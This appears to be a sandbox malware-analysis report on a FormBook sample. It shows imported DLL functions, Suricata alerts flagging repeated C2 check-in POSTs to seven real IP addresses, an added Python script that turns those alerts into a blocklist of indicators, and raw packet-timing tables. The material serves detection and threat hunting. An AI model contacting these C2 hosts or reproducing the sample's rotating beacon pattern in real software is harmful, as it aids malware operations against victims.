OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | 
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-11T15:03:50.512729+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49859 | 217.160.0.113 | 80 | TCP
2024-12-11T15:03:53.179664+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49868 | 217.160.0.113 | 80 | TCP
2024-12-11T15:03:55.942073+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49874 | 217.160.0.113 | 80 | TCP
2024-12-11T15:04:14.656907+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49916 | 154.90.58.209 | 80 | TCP
2024-12-11T15:04:17.313122+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49926 | 154.90.58.209 | 80 | TCP
2024-12-11T15:04:19.984922+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49933 | 154.90.58.209 | 80 | TCP
2024-12-11T15:04:29.984933+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49955 | 38.181.21.178 | 80 | TCP
2024-12-11T15:04:32.641240+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49964 | 38.181.21.178 | 80 | TCP
2024-12-11T15:04:35.297492+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49972 | 38.181.21.178 | 80 | TCP
2024-12-11T15:04:53.733644+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49984 | 23.167.152.41 | 80 | TCP
2024-12-11T15:04:56.561078+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49985 | 23.167.152.41 | 80 | TCP
2024-12-11T15:04:59.205755+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49986 | 23.167.152.41 | 80 | TCP
2024-12-11T15:05:10.266493+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49988 | 103.75.185.22 | 80 | TCP
2024-12-11T15:05:12.922549+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49989 | 103.75.185.22 | 80 | TCP
2024-12-11T15:05:15.578838+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49990 | 103.75.185.22 | 80 | TCP
2024-12-11T15:05:25.110598+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49992 | 162.0.213.94 | 80 | TCP
2024-12-11T15:05:27.755607+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49993 | 162.0.213.94 | 80 | TCP
2024-12-11T15:05:30.482484+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49994 | 162.0.213.94 | 80 | TCP
2024-12-11T15:05:40.825659+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49996 | 161.97.168.245 | 80 | TCP
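The alert table shows the behaviour that matters for triage: the same ETPRO signature fires three times against each destination, the three POSTs to one host are roughly 2.7 seconds apart, and the sample then moves on to the next host, cycling through seven addresses in under two minutes. As the page renders the rows with their cells run together, the destination address and port cannot be split unambiguously by eye ("217.160.0.11380" is 217.160.0.113 on port 80, but also 217.160.0.11 on port 380). The Python below is an added example, not part of Joe Sandbox or of this sample's analysis: it parses rows copied verbatim from the table above, anchors the source column on the analysis VM's address (192.168.2.7, as in the report), enumerates every valid IP/port split of the tail and prefers a well-known port, then summarises per-destination check-in counts and spacing. The 7-digit SID, the 5-digit ephemeral-port assumption (Windows allocates from 49152 upward) and the LIKELY_DST_PORTS preference are the example's own.

```python
"""Triage helper: parse flattened Joe Sandbox Suricata alert rows and
summarise C2 check-ins per destination.

Added example for this report; not part of Joe Sandbox or the analysed sample.
"""
import re
from collections import OrderedDict
from datetime import datetime

# Rows copied verbatim from the alert table above (cells concatenated
# without separators, exactly as the page renders them).
ALERT_ROWS = [
    "2024-12-11T15:03:50.512729+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749859217.160.0.11380TCP",
    "2024-12-11T15:03:53.179664+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749868217.160.0.11380TCP",
    "2024-12-11T15:03:55.942073+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749874217.160.0.11380TCP",
    "2024-12-11T15:04:14.656907+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749916154.90.58.20980TCP",
    "2024-12-11T15:04:17.313122+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749926154.90.58.20980TCP",
    "2024-12-11T15:04:19.984922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749933154.90.58.20980TCP",
    "2024-12-11T15:05:40.825659+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749996161.97.168.24580TCP",
]

# Assumption: when a row admits several IP/port splits, prefer these ports.
LIKELY_DST_PORTS = (80, 443, 8080, 8443)


def _valid_ipv4(s):
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and str(int(p)) == p and int(p) <= 255 for p in parts)


def split_ip_port(tail):
    """Split a concatenated '<dst ip><dst port>' string such as '217.160.0.11380'.
    The split is inherently ambiguous; return (ip, port, all_candidates)."""
    cands = []
    for k in range(1, 6):                      # a port has 1 to 5 digits
        ip, port = tail[:-k], tail[-k:]
        if port.isdigit() and 1 <= int(port) <= 65535 and _valid_ipv4(ip):
            cands.append((ip, int(port)))
    if not cands:
        raise ValueError("no valid ip/port split for %r" % tail)
    for ip, port in cands:                     # well-known port wins ...
        if port in LIKELY_DST_PORTS:
            return ip, port, cands
    return cands[0][0], cands[0][1], cands     # ... else longest IP


def parse_alert_row(row, local_ip):
    """Parse one flattened row. local_ip anchors the source column: in a
    sandbox every alert originates from the analysis VM."""
    pat = re.compile(
        r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{6}[+-]\d{4})"
        r"(?P<sid>\d{7})"                      # Emerging Threats SIDs: 7 digits
        r"(?P<sig>.+?)(?P<sev>\d)"             # signature text, then severity
        + re.escape(local_ip) +
        r"(?P<sport>\d{5})(?P<tail>\d[\d.]+)(?P<proto>TCP|UDP|ICMP)$")
    m = pat.match(row)
    if not m:
        raise ValueError("unparseable row: %r" % row)
    dst, dport, cands = split_ip_port(m.group("tail"))
    return {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%f%z"),
        "sid": int(m.group("sid")),
        "signature": m.group("sig"),
        "severity": int(m.group("sev")),
        "src": local_ip,
        "sport": int(m.group("sport")),
        "dst": dst,
        "dport": dport,
        "proto": m.group("proto"),
        "ambiguous": len(cands) > 1,           # more than one legal split
    }


def summarize(rows, local_ip):
    """Group check-ins by destination in first-seen order and compute the
    mean spacing between consecutive alerts to the same host."""
    by_dst = OrderedDict()
    for row in rows:
        a = parse_alert_row(row, local_ip)
        by_dst.setdefault(a["dst"], []).append(a)
    out = OrderedDict()
    for dst, hits in by_dst.items():
        hits.sort(key=lambda a: a["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
        out[dst] = {
            "count": len(hits),
            "dports": sorted({a["dport"] for a in hits}),
            "sids": sorted({a["sid"] for a in hits}),
            "mean_gap_s": round(sum(gaps) / len(gaps), 3) if gaps else None,
            "first_seen": hits[0]["ts"],
        }
    return out


def iocs(summary):
    """Flatten the summary to 'ip:port' strings for a blocklist or a hunt."""
    return ["%s:%d" % (dst, p) for dst, s in summary.items() for p in s["dports"]]


if __name__ == "__main__":
    s = summarize(ALERT_ROWS, "192.168.2.7")
    for dst, info in s.items():
        print(dst, info["count"], info["mean_gap_s"], info["dports"])
    print(iocs(s))
```

Run stand-alone it prints one line per destination (count, mean gap, ports) followed by the ip:port list; fed the full table it reproduces the pattern visible above, three POSTs per host about 2.7 s apart and a hop to the next host after each burst. FormBook is known to mix decoy hosts into its C2 list, so treat every destination here as an IOC for hunting and blocking rather than as confirmed live infrastructure, and keep the "ambiguous" flag in mind when a row's port is not one of the preferred ones.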
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 11, 2024 15:03:31.811115980 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:31.930546045 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:31.930658102 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:31.938921928 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:32.058398008 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292248964 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292359114 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292371035 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292484045 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292598009 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:33.292663097 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:33.292690992 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292704105 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292714119 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292726994 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292740107 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292748928 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:33.292753935 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.292769909 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:33.292800903 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:33.412276030 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.412372112 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:33.412497997 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:33.415720940 CET | 49819 | 80 | 192.168.2.7 | 104.21.24.198
Dec 11, 2024 15:03:33.535218954 CET | 80 | 49819 | 104.21.24.198 | 192.168.2.7
Dec 11, 2024 15:03:49.108186007 CET | 49859 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:49.227473974 CET | 80 | 49859 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:49.227730989 CET | 49859 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:49.239543915 CET | 49859 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:49.358994007 CET | 80 | 49859 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:50.512629986 CET | 80 | 49859 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:50.512665987 CET | 80 | 49859 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:50.512728930 CET | 49859 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:50.750423908 CET | 49859 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:51.774693012 CET | 49868 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:51.894129992 CET | 80 | 49868 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:51.894253969 CET | 49868 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:51.908502102 CET | 49868 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:52.027869940 CET | 80 | 49868 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:53.179491043 CET | 80 | 49868 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:53.179604053 CET | 80 | 49868 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:53.179663897 CET | 49868 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:53.422441006 CET | 49868 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:54.441011906 CET | 49874 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:54.560724974 CET | 80 | 49874 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:54.560888052 CET | 49874 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:54.575210094 CET | 49874 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:54.695615053 CET | 80 | 49874 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:54.699395895 CET | 80 | 49874 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:55.941884995 CET | 80 | 49874 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:55.942012072 CET | 80 | 49874 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:55.942073107 CET | 49874 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:56.078531027 CET | 49874 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:57.097616911 CET | 49880 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:57.217380047 CET | 80 | 49880 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:57.217461109 CET | 49880 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:57.225361109 CET | 49880 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:57.344866991 CET | 80 | 49880 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:58.500950098 CET | 80 | 49880 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:58.500996113 CET | 80 | 49880 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:58.501571894 CET | 49880 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:58.501774073 CET | 80 | 49880 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:03:58.502512932 CET | 49880 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:58.503870010 CET | 49880 | 80 | 192.168.2.7 | 217.160.0.113
Dec 11, 2024 15:03:58.623183966 CET | 80 | 49880 | 217.160.0.113 | 192.168.2.7
Dec 11, 2024 15:04:13.013411999 CET | 49916 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:13.132827997 CET | 80 | 49916 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:13.132915974 CET | 49916 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:13.146753073 CET | 49916 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:13.266232967 CET | 80 | 49916 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:14.656907082 CET | 49916 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:14.755060911 CET | 80 | 49916 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:14.755311012 CET | 80 | 49916 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:14.755462885 CET | 49916 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:14.755558014 CET | 49916 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:14.776648045 CET | 80 | 49916 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:14.777286053 CET | 49916 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:15.675080061 CET | 49926 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:15.795500040 CET | 80 | 49926 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:15.795667887 CET | 49926 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:15.808640957 CET | 49926 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:15.928057909 CET | 80 | 49926 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:17.313122034 CET | 49926 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:17.411772013 CET | 80 | 49926 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:17.411884069 CET | 80 | 49926 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:17.411916971 CET | 49926 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:17.411957979 CET | 49926 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:17.432410955 CET | 80 | 49926 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:17.432507992 CET | 49926 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:18.331391096 CET | 49933 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:18.450859070 CET | 80 | 49933 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:18.450975895 CET | 49933 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:18.470424891 CET | 49933 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:18.589855909 CET | 80 | 49933 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:18.589889050 CET | 80 | 49933 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:19.984921932 CET | 49933 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:20.104787111 CET | 80 | 49933 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:20.104881048 CET | 49933 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:21.009886026 CET | 49939 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:21.129319906 CET | 80 | 49939 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:21.129538059 CET | 49939 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:21.137115002 CET | 49939 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:21.256524086 CET | 80 | 49939 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:22.734311104 CET | 80 | 49939 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:22.734384060 CET | 80 | 49939 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:22.734450102 CET | 49939 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:22.740768909 CET | 49939 | 80 | 192.168.2.7 | 154.90.58.209
Dec 11, 2024 15:04:22.860393047 CET | 80 | 49939 | 154.90.58.209 | 192.168.2.7
Dec 11, 2024 15:04:28.349085093 CET | 49955 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:28.468703985 CET | 80 | 49955 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:28.468880892 CET | 49955 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:28.480719090 CET | 49955 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:28.600651026 CET | 80 | 49955 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:29.984932899 CET | 49955 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:30.001517057 CET | 80 | 49955 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:30.001638889 CET | 49955 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:30.001682043 CET | 80 | 49955 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:30.001740932 CET | 49955 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:30.104296923 CET | 80 | 49955 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:30.104365110 CET | 49955 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:31.003127098 CET | 49964 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:31.122766972 CET | 80 | 49964 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:31.122984886 CET | 49964 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:31.135067940 CET | 49964 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:31.254292011 CET | 80 | 49964 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:32.641239882 CET | 49964 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:32.666948080 CET | 80 | 49964 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:32.667040110 CET | 80 | 49964 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:32.667062998 CET | 49964 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:32.667094946 CET | 49964 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:32.760560989 CET | 80 | 49964 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:32.760688066 CET | 49964 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:33.659455061 CET | 49972 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:33.779598951 CET | 80 | 49972 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:33.779753923 CET | 49972 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:33.792908907 CET | 49972 | 80 | 192.168.2.7 | 38.181.21.178
Dec 11, 2024 15:04:33.912405968 CET | 80 | 49972 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:33.912432909 CET | 80 | 49972 | 38.181.21.178 | 192.168.2.7
Dec 11, 2024 15:04:35.297492027 CET | 49972 | 80 | 192.168.2.7 | 38.181.21.178
                                                                Dec 11, 2024 15:04:35.320136070 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:35.320226908 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:35.320260048 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:35.320301056 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:35.416927099 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:35.417079926 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:36.315690041 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:36.435189962 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:36.435306072 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:36.445671082 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:36.566096067 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:37.967968941 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:37.968061924 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:37.968108892 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:37.970577955 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:38.090220928 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:52.717590094 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:52.837054968 CET804998423.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:52.837418079 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:53.003578901 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:53.123347998 CET804998423.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:53.731065989 CET804998423.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:53.733644009 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:54.516314030 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:54.635857105 CET804998423.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:55.534421921 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:55.654239893 CET804998523.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:55.654380083 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:55.666630983 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:55.786272049 CET804998523.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:56.560976982 CET804998523.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:56.561078072 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:57.172732115 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:57.292352915 CET804998523.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:58.190977097 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:58.310620070 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:58.310708046 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:58.322983027 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:58.442704916 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:58.442780018 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:59.205634117 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:59.205754995 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:59.828746080 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:59.948353052 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:00.846916914 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:00.966578960 CET804998723.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:00.966695070 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:00.974229097 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:01.093678951 CET804998723.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:01.865892887 CET804998723.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:01.866180897 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:01.866863966 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:01.986319065 CET804998723.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:08.625334024 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:08.744740963 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:08.744956017 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:08.760087013 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:08.879589081 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.266493082 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:10.314253092 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.314271927 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.314281940 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.314373970 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:10.314374924 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:10.314454079 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:10.386085033 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.386149883 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:11.284523964 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:11.404211998 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:11.404378891 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:11.419085979 CET4998980192.168.2.7103.75.185.22
